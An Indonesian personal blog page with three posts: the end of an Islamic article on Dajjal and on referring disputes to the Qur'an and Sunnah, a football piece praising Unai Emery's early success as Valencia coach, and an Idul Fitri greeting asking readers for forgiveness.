Tempat kemunculannya kelak dari sebuah jalan yang terletak antara negeri Syam dan Irak. Dia pun akan tinggal di muka bumi ini selama 40 hari; hari pertama lamanya satu tahun, hari kedua lamanya satu bulan, hari ketiga lamanya satu pekan, hari keempat dan seterusnya lamanya seperti hari-hari biasa (24 jam). Allah Subhanahu wa Ta’ala kuasakan pula baginya kemampuan untuk mengelilingi dunia dengan sekejap seiring dengan berhembusnya arah angin (kecuali kota Makkah dan Madinah, tak mampu dimasukinya karena dijaga oleh para malaikat Allah Subhanahu wa Ta’ala). Sebagaimana pula Allah Subhanahu wa Ta’ala kuasakan baginya hal-hal aneh lainnya yang tak dimampui oleh manusia biasa.
Kemudian terjadilah pertempuran yang dahsyat antara Dajjal berikut pengikutnya melawan pasukan Islam yang dipimpin oleh Al-Imam Mahdi yang diperkuat oleh Nabi ‘Isa ‘alaihissalam yang Allah Subhanahu wa Ta’ala turunkan dari langit. Akhirnya Dajjal tewas dibunuh oleh Nabi ‘Isa ‘alaihissalam di daerah Bab Ludd, Palestina7. Demikianlah hakikat Dajjal yang dipersoalkan eksistensinya itu. Untuk mengetahui lebih rinci tentang Dajjal dan hakikatnya, silakan membaca rubrik Kajian Utama pada edisi ini.

Rambu-rambu Penting dalam Perselisihan dan Perbedaan Pendapat
Para pembaca yang mulia, dalam Al-Qur`anul Karim, Allah Subhanahu wa Ta’ala Yang Maha Rahman telah memberikan bimbingan-Nya sekaligus solusi bagi segala perselisihan, perbedaan pendapat, dan kontroversi yang mengitari kehidupan para hamba-Nya. Termasuk perkara Dajjal yang tengah dipermasalahkan ini. Allah Subhanahu wa Ta’ala berfirman:
فَإِنْ تَنَازَعْتُمْ فِي شَيْءٍ فَرُدُّوْهُ إِلَى اللهِ وَالرَّسُوْلِ إِنْ كُنْتُمْ تُؤْمِنُوْنَ بِاللهِ وَالْيَوْمِ اْلآخِرِ ذَلِكَ خَيْرٌ وَأَحْسَنُ تَأْوِيْلاً
“Dan jika kalian berselisih dalam suatu perkara, maka kembalikanlah kepada Allah dan Rasul-Nya jika kalian beriman kepada Allah dan hari akhir. Yang demikian itu lebih utama dan lebih baik akibatnya.” (An-Nisa`: 59)
Al-Imam Al-Qurthubi rahimahullah berkata: “(Kembalikanlah kepada Allah dan Rasul-Nya), maksudnya: kembalikanlah keputusan permasalahan tersebut kepada Kitabullah (Al-Qur`an) dan kepada Rasul-Nya dengan bertanya kepada beliau semasa hidupnya atau dengan merujuk kepada Sunnah Rasulullah Shallallahu ‘alaihi wa sallam sepeninggal beliau. Demikianlah keterangan dari Mujahid, Al-A’masy, dan Qatadah rahimahumullah, dan memang benar apa yang mereka katakan itu. Barangsiapa tidak sepakat dengan (apa yang Allah Subhanahu wa Ta’ala bimbingkan, pen.) ini, maka telah cacat keimanannya karena Allah Subhanahu wa Ta’ala telah nyatakan dalam ayat tersebut; (jika kalian beriman kepada Allah Subhanahu wa Ta’ala dan hari akhir).” (Tafsir Al-Qurthubi juz 5, hal. 261)
Kembali (merujuk) kepada Al-Qur`an dan Sunnah Rasul-Nya dalam setiap permasalahan yang diperselisihkan amat besar hikmahnya. Sebagaimana yang dikatakan Al-Imam Al-Qurthubi rahimahullah ketika menafsirkan surat Ali ‘Imran ayat 103: “Allah mewajibkan kepada kita agar berpegang teguh dengan Kitab-Nya (Al-Qur`an) dan Sunnah Nabi-Nya, serta merujuk kepada keduanya di saat terjadi perselisihan. Ia (juga) memerintahkan kepada kita agar bersatu di atas Al-Qur`an dan As-Sunnah secara keyakinan dan amalan. Itulah sebab keselarasan kata dan bersatunya apa yang tercerai-berai, yang dengannya akan teraih maslahat dunia dan agama serta selamat dari perselisihan…” (Tafsir Al-Qurthubi juz 4, hal. 105)
Lain halnya dengan akal (semata) yang di-Tuhan-kan oleh sebagian orang serta lebih diutamakan daripada Al-Qur`an dan Sunnah Rasulullah Shallallahu ‘alaihi wa sallam (syariat)8. Padahal fenomena akal ini amat memilukan. Tak sedikit dari para pemujanya yang menyesal dan bingung akibat jalan yang ditempuhnya itu.

Posted in | 0 komentar

Keajaiban Pelatih Baru Valencia

tprasetyo96.blogspot present:

Usianya baru 36 tahun, kepelatihannya juga baru berumur empat musim. Namun bersama Valencia, Unai Emery langsung memberikan keajaiban sekaligus mencatatkan rekor buat el-che.

Rasanya tak berlebihan jika menyebut apa yang diberikan Emeri buat Valencia saat ini adalah keajaiban. Faktanya, penampilan meyakinkan Carlos Marchena cs di awal musim ini memang tak bisa dilepaskan dari peran pelatih belia tersebut.

Sebagai salah satu klub besar Liga Spanyol, duduk di puncak klasemen bukan barang baru buat Valencia. Namun jika melihat betapa sulit perjuangan mereka musim lalu, di mana mereka nyaris terdegradasi dan kemudian duduk di posisi 10 klasemen akhir, apa yang diraih "Kelelawar Hitam" kini adalah pencapaian yang luar biasa baik.

Kemenangan 1-0 atas Valladolid dinihari tadi membuat Valencia memuncaki klasemen dengan mengumpulkan 16 poin dari 18 nilai maksimal yang bisa didapat. Satu-satunya kegagalan meraih nilai sempurna adalah saat diimbangi Almeria 2-2.

Dengan catatan seperti itu Emery mencatatkan dirinya sebagai pelatih debutan tersukses sepanjang sejarah klub yang bermarkas di Stadion Mestalla itu. Padahal saat ditunjuk menggantikan Ronald Koeman jelang dimulainya musim ini, tak banyak harapan disangkutkan di pundak Emery.

Penampilan bagus Unai Emery dan Valencia juga menular di ajang Piala UEFA di mana mereka meraih hasil 100% dari dua pertandingan. Satu-satunya kekalahan diderita atas Real Madrid di Piala Super Spanyol.

Sebelum membesut Valencia mungkin tak banyak yang tahu siapa Emery. Selain tak pernah membela klub besar, kecuali Real Sociedad musim 1995/1996, karir kepelatihan pria kelahiran 3 November 1971 itu jauh dari kesan mentereng. Sukses terbesar Emery adalah membawa Almeria promosi ke divisi utama dan kemudian mengantar mereka duduk di posisi delapan musim lalu.

Sebagai pelatih muda yang tengah merentas sukses, Emery tak lantas berbesar hati. Dia malah memilih bersikap merendah dengan mengatakan kalau apa yang didapat kini hanya merupakan bagian dari proses berkembangnya Valencia.



Perjuangan untuk merengkuh tropi juara seperti yang terakhir didapat musim 2003/04 lalu jelas sulit didapat, apalagi kompetisi yang harus dilalui masih sangat panjang. Namun kalau bisa mempertahankan ritme seperti di enam pekan perdana ini, Valencia akan kembali jadi penantang di papan atas klasemen.

Sukzes slalu buat el che
Posted in | 0 komentar

Idul Fitri 1429 H

tprasetyo96.blogspot.com mengucapkan "Minal Aidzin Walfaizin, Mohon Maaf Lahir dan Batin". Dihari yang penuh maaf ini walaupun udah telambat beberapa hari tapi gakpapa. saya ingin meminta maaf kepada para pembaca, pemirsa, pendengar, rekan2 dan sodara semuanya, bilamana saya telah berbuat silaf dan hilaf mohon dimaafkan. Walaupun cm sekedar blog namun bisa membuat orang jadi senewen, mumet, pusing, pingin marah, geram, gregeten dan LL. Saya juga memohon maaf apabila dalam penyampaian saya dirasa kurang jelas atau malah bisa membikin pusing karena saya juga masih dalam tahap belajar. Saya juga memohon maaf apabila tidak bisa menjawab semua komentar maupun pertanyaan rekan2 semua baik melalui Comment Box, Shoutbox, Email maupun YM. Saya juga memohon maaf atas semua tindakan, ucapan, maupun perbuatan saya baik yang disengaja maupun tidak. Saya juga memohon maaf untuk DLL. Pokoknya intinya maafin saya deh ya.....ya...ya...
Diikhlasken kemawon sedoyo kalepatan. . . . .hehehehehe
Posted in | 0 komentar